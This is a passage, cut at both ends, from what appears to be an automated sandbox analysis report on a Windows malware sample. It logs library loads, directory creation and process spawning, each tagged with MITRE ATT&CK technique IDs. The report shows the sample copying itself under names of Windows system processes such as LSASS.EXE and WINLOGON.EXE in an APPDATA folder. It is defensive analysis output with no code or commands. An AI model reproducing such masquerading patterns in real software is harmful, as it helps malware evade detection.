(UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005980)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005980)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003856)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002060)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002060)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002060)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002060)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002060)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002060)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005868)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005868)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005868)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005868)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005868)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001132)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001132)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003048)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003048)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003048)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003048)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003048)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003048)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004280)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004272)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002792)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002792)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002788)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002788)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000708)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000468)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000468)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75A00000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00004664)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005576)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005612)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005784)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001308)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004040)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004928)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005884)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005824)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005972)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005260)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003164)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006044)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005588)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003100)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003168)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003988)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004168)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005636)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005428)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004172)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00004664)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005576)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005612)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005784)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001308)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004040)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004928)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005884)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005824)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005972)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005260)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003164)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006044)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005588)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003100)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003168)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003988)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004168)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005636)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005428)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004172)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00004664) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00004664) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67E3CC1F.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67E3CC1F.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67E3CD97.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67E3CD97.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67E3CBAD.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67E3CBAD.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e786a@ADVAPI32.dll\"\n \"0e000f00703f786a@ADVAPI32.dll\"\n \"0e000f00cc3f786a@ADVAPI32.dll\"\n \"11001200b447786a@ADVAPI32.dll\"\n \"110012004848786a@ADVAPI32.dll\"\n \"120013008c48786a@ADVAPI32.dll\"\n \"12001300e448786a@ADVAPI32.dll\"\n \"14001500dc6f786a@ADVAPI32.dll\"\n \"14001500f46f786a@ADVAPI32.dll\"\n \"140015000c70786a@ADVAPI32.dll\"\n \"170018002470786a@ADVAPI32.dll\"\n \"0d000e003c70786a@ADVAPI32.dll\"\n \"110012004c70786a@ADVAPI32.dll\"\n \"110012006070786a@ADVAPI32.dll\"\n \"0f001000a071786a@ADVAPI32.dll\"\n \"14001500e071786a@ADVAPI32.dll\"\n \"14001500f871786a@ADVAPI32.dll\"\n \"0c000d004072786a@ADVAPI32.dll\"\n \"0c000d005072786a@ADVAPI32.dll\"\n \"0e000f006072786a@ADVAPI32.dll\"\n \"0e000f007072786a@ADVAPI32.dll\"\n \"0b000c008072786a@ADVAPI32.dll\"\n \"18001900b874786a@RPCRT4.dll\"\n \"13001400e474786a@RPCRT4.dll\"\n \"14001500f874786a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00000940)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005576)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001308)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00001308)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005884)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005884)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003164)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003164)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003120)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003120)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004116)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00000940)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00004664)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00004664)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005576)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005576)\n 